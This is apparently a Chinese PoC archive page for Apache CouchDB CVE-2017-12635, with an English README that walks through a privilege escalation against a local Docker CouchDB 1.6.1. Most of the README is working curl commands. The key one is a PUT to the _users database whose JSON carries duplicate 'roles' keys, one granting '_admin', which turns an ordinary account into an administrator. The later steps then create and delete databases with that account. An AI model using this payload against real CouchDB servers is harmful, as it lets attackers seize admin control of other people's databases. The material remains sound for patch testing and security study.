关联漏洞
标题:
Apache CouchDB 安全漏洞
(CVE-2017-12635)
描述:Apache CouchDB是美国阿帕奇(Apache)软件基金会的一个免费、开源、面向文档的数据库,是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 Apache CouchDB 1.7.0之前的版本和2.1.1之前的2.x版本中存在安全漏洞,该漏洞源于基于rlang的JSON解析器和基于JavaScript的JSON解析器之间存在差异。攻击者可利用该漏洞访问任意的shell命令或获取管理员权限。
介绍
# Apache CouchDB 1.7.0 / 2.x < 2.1.1 - CVE-2017-12635 - Remote Privilege Escalation
## Detail
- Apache CouchDB is a document-oriented NoSQL database, implemented in Erlang.
- Due to the discrepancy between the Erlang-based JSON parser and JavaScript-based JSON parser, there was a vulnerability in CouchDB before 1.7.0 and 2.x before 2.1.1 allowing non-admin users to escalate privilege by submitting _users documents with duplicate roles keys used for access control within the databases, including the special case_admin role, that denotes administrative users.
**To recap, the vulnerability allows non-admin users to give themselves admin privileges.**
- CouchDB uses special database (called _users by default) to store information about registered users. This is a system database – this means that while it shares common database API, there are some special security-related constraints applied and used agreements on documents structure.
Only administrators may GET, PUT or DELETE any document in_users database.
Users may only access (GET /_users/org.couchdb.user:\<username>) or modify (PUT /_users/org.couchdb.user:\<username>) documents that they owns.
## Steps to exploit
1. Run docker image:
```docker container run -d --name couchdb-sandbox -p 5984:5984 couchdb:1.6.1```
2. Check sure the CouchDB instance is launched and working
```curl -X GET http://localhost:5984```
3. Query: All databases in the instance
```curl -X GET http://localhost:5984/_all_dbs```
4. Query: Create an admin account with credentials admin:admin
```curl -X PUT http://localhost:5984/_config/admins/admin -d '"admin"'```
5. Query: Try create a new database named *records*
```curl -X PUT http://localhost:5984/records```
We cant create because dont have admin account
6. Query: Create a new database named records with admin authentication
```curl -X PUT http://admin:admin@localhost:5984/records```
7. Query: Create a new document in _users database
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "type": "user"}'
```
We cant create an account with admin role
8. Query: Create a new document in _users database with admin role
```
curl -X PUT http://localhost:5984/_users/org.couchdb.user:guest \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{"name": "guest", "password": "guest", "roles": ["_admin"], "roles": [], "type": "user"}'
```
we have an admin account now!
9. Query: Create a new database named new_recorDs with guest authentication
```curl -X PUT http://guest:guest@localhost:5984/new_records```
10. Query: Delete the database named new_records with guest authentication
```curl -X DELETE http://guest:guest@localhost:5984/new_records```
文件快照
[4.0K] /data/pocs/69331d5024ccb37937ab967358497f860c70c2f8
└── [2.9K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。